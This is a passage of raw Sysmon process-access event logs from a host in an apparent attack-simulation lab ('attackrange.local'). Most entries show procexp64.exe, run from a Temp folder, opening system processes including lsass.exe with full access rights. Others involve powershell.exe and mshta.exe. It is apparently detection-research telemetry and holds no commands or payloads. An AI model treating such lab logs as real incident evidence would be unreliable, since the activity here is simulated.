15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 